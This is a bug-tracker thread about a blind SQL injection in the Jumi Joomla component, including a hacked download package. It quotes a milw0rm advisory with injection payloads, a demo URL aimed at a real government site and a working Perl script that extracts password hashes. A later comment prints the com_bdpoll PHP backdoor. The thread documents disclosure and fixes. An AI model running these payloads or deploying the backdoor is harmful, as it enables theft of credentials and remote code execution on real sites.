edo888 / jumi

Joomla! custom content extension
http://2glux.com/projects/jumi

Blind SQL-injection Vulnerability in Jumi component #35

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
From http://milw0rm.com/exploits/8968
=========================================
 #####################################################
 # [+] Author        :  Chip D3 Bi0s                 #
 # [+] Email         :  chipdebios[alt+64]gmail.com  #
 # [+] Vulnerability :  Blind SQL injection          #
 #####################################################

Example:
http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>

n = a valid fileid number

<Sql code>:
'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
/index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...

DEMO LIVE:
http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(subs
tring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101
/*

etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

If you want to save the work, you can use the following script:

-------------------------------

#!/usr/bin/perl -w

use LWP::UserAgent;

print "\t\t-------------------------------------------------------------\n\n";
print "\t\t                      |  Chip d3 Bi0s |                       \n\n";
print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection       \n\n";
print "\t\t-----------------------------------------------------------------\n\n";

print "http://wwww.host.org/Path: ";
chomp(my $target=<STDIN>);
print " [-] Introduce fileid: ";
chomp($z=<STDIN>);

print " [+] Password: ";

$column_name="concat(password)";
$table_name="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

for ($x=1;$x<=32;$x++) # x: limit referring to the character position
{            # c: referring to ASCII 48-57, 97-102

  for ($c=48;$c<=57;$c++) 

{
 $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = "com_";
# print "limit:";
# print "$x";
# print "; assci:";
# print "$c;";
 if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
 }

for ($c=97;$c<=102;$c++) 
{

 $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*";
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = "com_";
# print "limit:";
# print "$x";
# print "; assci:";
# print "$c;";
 if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
 }
}

# milw0rm.com [2009-06-15]

====================================================

Original issue reported on code.google.com by martin2hajek@gmail.com on 16 Jun 2009 at 9:13

GoogleCodeExporter commented 9 years ago
fileid is now forced to be an integer

Original comment by edo...@gmail.com on 16 Jun 2009 at 9:40
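As an added illustration of the fix described in the comment above (this is not Jumi's own code and is not from the original thread), the vulnerable pattern is shown beside a version that forces fileid to an integer; the table name, the column name and the quoting of the id are assumptions:

```php
<?php
// Added example, not Jumi's own code. It reproduces the pattern the thread
// describes: a request parameter (fileid) dropped into SQL text, first in a
// vulnerable form and then forced to an integer, as the fix in the thread does.
// The table name, the column name and the quoting of the id are assumptions.

// Vulnerable form: the raw fileid string is concatenated into the query, so the
// advisory's payload (which starts with a quote) becomes part of the SQL.
function buildQueryVulnerable($fileid)
{
    return "SELECT * FROM jos_jumi WHERE id = '" . $fileid . "'";
}

// Hardened form: the value must be a whole number before it touches the query.
// Joomla 1.5's JRequest::getInt() applies an (int) cast, which keeps the leading
// digits of the payload and discards the rest; FILTER_VALIDATE_INT is stricter
// and rejects the whole value.
function buildQueryHardened($fileid)
{
    $id = filter_var($fileid, FILTER_VALIDATE_INT);
    if ($id === false || $id < 1) {
        return null; // not a valid id: refuse rather than silently truncate
    }
    return "SELECT * FROM jos_jumi WHERE id = " . $id;
}

// Constructed sample input: the first payload from the advisory, URL-decoded
// ('+' in the query string stands for a space).
$payload = "2' and (select substring(concat(1,password),1,1) "
         . "from jos_users limit 0,1)=1/*";

echo "vulnerable: ", buildQueryVulnerable($payload), "\n";
echo "hardened (payload): ", var_export(buildQueryHardened($payload), true), "\n";
echo "hardened (valid id): ", var_export(buildQueryHardened("2"), true), "\n";
echo "getInt-style cast of the payload: ", (int) $payload, "\n";
```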

GoogleCodeExporter commented 9 years ago
This issue is very serious; it permits the creation of a backdoor:

http://forum.joomla.org/viewtopic.php?f=432&t=440921

com_bdpoll
<?php
$f=$_POST["file"];
$t=$_POST["text"];
$t=str_replace(" ","+",$t);
$h=fopen($f,"w");
fwrite($h,base64_decode($t));
$d=dirname(__FILE__);
include($f);
fclose($h);
unlink($f);
?>

That permits a remote user to arbitrarily change any file's content.

(It was used to deface our index.php.)

Please report this kind of bug more seriously to the Joomla community.

Stefano Gargiulo.

Original comment by rastrano on 16 Oct 2009 at 8:54

GoogleCodeExporter commented 9 years ago
Please update the latest downloadable archive....

It still contains the exploitable jumi.php:

http://jumi.vedeme.cz/index.php?option=com_remository&Itemid=53&func=fileinfo&id=54

---
I repeat that this is a very serious exploit: you can destroy an entire Joomla site by executing arbitrary SQL and PHP code on the machine... (you have a nice eval() done on a field queried from the DB)
---

Juniper also said this:
http://www.juniper.net/security/auto/vulnerabilities/vuln35384.html

regards,
Stefano.

Original comment by rastrano on 16 Oct 2009 at 1:46

GoogleCodeExporter commented 9 years ago
Stefan,

Thanks for the issue report. It was already fixed in the SVN, but it was probably released by mistake. I do confirm that in the last package, 2.0.4, we have the old vulnerable file.

Martin, please make a new package with the fixed file.

Regards,

Edvard

Original comment by edo...@gmail.com on 16 Oct 2009 at 6:59

GoogleCodeExporter commented 9 years ago
Oh, verified. By mistake I've uploaded the old version for download.
I will correct it immediately.
For clarity I will release it as ver. 2.0.5 and provide an upgrade package.

Original comment by martin2hajek@gmail.com on 17 Oct 2009 at 8:08

GoogleCodeExporter commented 9 years ago
Has been fixed in Jumi 2.0.5 for Joomla 1.5. Other releases are OK.

Original comment by martin2hajek@gmail.com on 27 Oct 2009 at 8:16

GoogleCodeExporter commented 9 years ago
Ugh, never mind. I answered my own question. I have version 2.1.0 beta3 and I just found that com_bdpoll backdoor on my site. Does the current version on the download site fix this?

Original comment by grayce.e...@gmail.com on 3 Nov 2009 at 8:38

GoogleCodeExporter commented 9 years ago
Incredible... please be more serious... 

I know people that switched to Drupal after this exploit, believing that it was Joomla that was vulnerable....

How is it possible to fix a problem in 2.0.5 and not in 2.1.0????

I'm starting to suppose that you enjoy or make money with bd_poll....

Original comment by rastrano on 6 Nov 2009 at 11:55

GoogleCodeExporter commented 9 years ago
Stefano,

Please don't attempt to make unwarranted attacks on people.

We are very serious. And Martin decided to leave the Jumi project, because he felt that this was his mistake.

The truth is: the Jumi website was hacked and the download files were backdoored.

Jumi 2.1.0 is still beta, which means that we don't recommend using it on your production website; however, it is fixed. In any case, I want to let you know one more time that Jumi is licensed under the GNU/GPL and it comes with absolutely no warranty.

Original comment by edo...@gmail.com on 6 Nov 2009 at 12:16

GoogleCodeExporter commented 9 years ago
> The truth is: Jumi website was hacked and the download files were backdoored.

I apologize for my tone, I didn't know this...

> And Martin decided to leave the Jumi project, because he felt 
> that this is his mistake.

Mistakes can happen...

I'm sad to know about Martin's decision because I think that you and Martin did great work in developing Jumi (it's very useful and a lot of people I know use it).

Then I didn't want to attack you: I was just worried about preventing inexperienced people from being victims of this exploit, because I think that in the open-source spirit there is also the intention to help the less skilled people: then the problem is not the mistake itself, but the lack of seriousness in not speedily replacing a couple of getInt in a couple of downloadable files.

Anyway, these kinds of mistakes can also happen, so I apologize again for my last message (I made mistakes too) and I wish you to keep up the good work!

best regards,
Stefano.

Original comment by rastrano on 6 Nov 2009 at 1:15